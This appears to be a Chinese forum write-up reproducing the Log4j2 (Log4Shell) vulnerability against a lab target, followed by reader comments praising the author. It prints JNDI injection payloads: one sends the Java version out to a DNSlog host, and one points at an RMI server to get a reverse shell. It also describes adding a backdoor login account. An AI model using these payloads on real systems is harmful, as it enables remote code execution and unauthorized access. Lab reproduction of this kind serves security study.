0x01 前言 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 0x02 环境搭建 如图下载进行搭建即可,搭建就不细说了可直接访问度娘即可 图 2-1 部署文件 0x03 漏洞复现 访问漏洞url:http://192.168.1.17:8080/ 图 3-1 Log4j2 靶场 访问靶场之后在其登录框传参输入payload:${jndi:ldap://${sys:java.version}.0bcjz2.dnslog.cn/} 此payload 是获取java版本如果Dnslog成功接收即代表漏洞存在 Dnslog成功接收 图 3-2 Dnslog Dnslog接收后尝试使用JNDI注入工具进行反弹shell 发现Dnslog成果接收后,我们可以在自己服务器或者本地起JNDI的服务,然后输入攻击payload:${jndi:rmi://10.198.198.215:1099/uenrdi} 图 3-3 Jndi注入工具 工具参数详解: -C 需要执行的命令 -A 自己需要反弹shell的服务器主机IP 图 3-4 3-5 反弹shell 添加用户 通过上图得知执行了攻击payload后成功拿到shell,接着就是添加用户进行远程登录 添加用户账号:admin/Admin@123../ 图 3-6 Linux操作终端 0x04 结束语 支持Log4j2 漏洞复现完结,如想需要工具的师傅或者有啥建议的师傅,可在评论区留言,感谢各位师傅观看!!!
小黑黑总复盘的针不戳
小黑期待下一篇文章
小黑 黑总硬!
黑总yyds
Colorado co神带带
0x6270 都靠0少带我 😀
tql
火线用户360bf4 师傅tql
稳的很
火线用户e11208 肯定稳
低哼 师傅带带
0x6270 好的会更新的
0x6270 必须的